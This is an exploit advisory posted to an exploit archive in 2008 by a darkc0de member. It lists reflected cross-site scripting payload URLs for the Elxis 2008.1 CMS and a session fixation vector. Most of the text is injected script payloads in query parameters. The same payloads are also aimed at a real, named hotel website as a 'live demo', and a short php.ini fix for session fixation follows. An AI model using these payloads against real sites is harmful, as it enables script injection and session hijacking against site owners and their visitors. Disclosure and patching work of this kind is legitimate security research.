Home / exploits elxis-xss.txt
Posted on 14 October 2008
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ ################################################################ # Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 # # -C1c4Tr1Z -Gabitzu and all darkc0de members # ;############################################################### # # Author: swappie [aka] faithlove # # Home : www.darkc0de.com # # Email : swappieakafaithlove@gmail.com # # Do researching and share! # ;############################################################### # # Title: Elxis 2008.1 Nemesis # # Issue Date: Monday, 29 September 2008 # # CMS Link: http://www.elxis-downloads.com/fserver/96.html # Vendor: http://www.elxis.org/ # # ;############################################################### # # Dork: I'm sure you can figure that by yourself, right? # ################################################################# ---------- XSS Vulns; ---------- http://www.site.com/?>'"><script>alert("XSS Vuln")</script> http://www.site.com/index.php/>"><script>alert("XSS Vuln")</script> http://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script> http://www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script> http://www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script> http://www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script> http://www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script> http://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script> ---------- Live Demo; ---------- http://www.hotelsinalbania.net/?>'"><script>alert("XSS Vuln")</script> http://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script> http://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script> http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script> http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script> http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script> http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script> http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script> ;==================================================================; ;==================================================================; ----------------- Session Fixation; ----------------- http://www.site.com/?PHPSESSID=[session_fixation] Explanation: The user's session ID could be fixed by the attacker before the user even logs on the target server so it wouldn't be needed to get the session ID afterwards. How to fix the "session fixation" ? There is a simple way to do it. Step 1. Open the file named php.ini from your server. Step 2. Look through the file for the following lines: ; This option enables administrators to make their users invulnerable to ; attacks which involve passing session ids in URLs; defaults to 0. ; session.use_only_cookies = 1 !![PLEASE NOTE THE ";"]!! Step 3. => [ and make it look like this: ] ; This option enables administrators to make their users invulnerable to ; attacks which involve passing session ids in URLs; defaults to 0. session.use_only_cookies = 1 Step 4. Restart the web server, php, whatever. Cheers, swappie [aka] faithlove
